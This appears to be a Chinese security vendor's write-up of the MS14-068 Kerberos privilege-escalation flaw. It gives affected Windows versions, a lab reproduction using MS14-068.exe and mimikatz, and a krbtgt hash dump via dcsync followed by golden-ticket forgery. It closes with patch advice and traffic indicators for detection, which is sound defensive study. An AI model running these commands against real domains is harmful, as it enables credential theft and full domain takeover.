MS14-068漏洞可谓是威力无穷,在域渗透中,第一步就是应该检测域控是否有这个漏洞,一旦域控没有打上这个补丁,将会使内网渗透变得十分简单。对于内网安全问题,聚铭网络也一直进行跟踪守护,切实协助企业组织做好网络安全防护建设工作,规避安全风险。
远程权限提升漏洞存在于Microsoft windows的Kerberos KDC实现中。存在该漏洞的症状是,Microsoft Kerberos KDC实现无法正确验证签名,这可能造成Kerberos服务票证的某些方面被人伪造。简单来说就是一个域内的普通账户可以利用此漏洞进行权限提升,升级为域管理员权限。
Microsoft Windows Windows Server 2012 GoldR2
Microsoft Windows Windows Server 2012 Gold
Microsoft Windows Windows 7 SP1
Microsoft Windows Vista SP2
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows 8.1
Microsoft Windows 8
域控没有打MS14-068补丁,攻击者拿下了一台域内的普通计算机并获得普通域用户以及密码/hash值以及用户suid。
1.搭建环境
域控制器:windows 2008 r2域内主机:windows 7MS14-068.exemimikatz工具
2.漏洞利用
1)查看域控是否有MS14-068这个漏洞,利用命令systeminfo,查看是否打补丁(KB3011780),下图中没有看到打MS14-068相关漏洞的补丁。
2)登陆域内主机利用whoami/all查看自己的用户名以及sid
3)利用MS14-068.exe生成一个新的票据:MS14-068.exe -u user@domAIn -s sid -d域控ip -p密码(出现报错的话一般是密码错误)
4)查看dir \域控计算机名称c$
5)利用mimikatz先清除票据,再导入刚刚制作新的票据
(1) Kerberos::purge #清除票据
(2) Kerberos::list #列出票据
(3) Kerberos::ptc 票据位置 #导入票据
6)复现成功。再次利用dir \域控计算机名称c$,发现提升到管理员权限,表明复现成功。
7)黄金票据伪造
a.查看用户krbtgt的hash:
lsadump:dcsync /domain:域名 /all /csv
查看用户的sid:
lsadump:dcsync /domain:域名 /user:krbtgt
b.制造票据
Kerberos::golden /admin:system /domain:域名 /sid :.... /krbtgt:...(hash) /ticket:票据名称
c.导入票据
Kerberos::purge
Kerberos::ptt 票据名称
d.复现成功
利用dir \域控名称c$,出现目录,表示成功。
1. 升级补丁
与此同时,请及时做好自查和预防工作,以免遭受黑客攻击。
1.正常流量
2.异常流量分析
Client在发起认证请求时,通过设置include-PAC为False,则返回TGT中不会包含PAC。
异常流量在1.AS-REQ阶段终端设置了pac为false
正常流量在1.AS-REQ阶段终端设置了pac为true
异常流量在3.TGS-REQ阶段终端又多了一个pac的设置,且值为false
正常流量在3.TGS-REQ阶段终端没有关于pac 的设置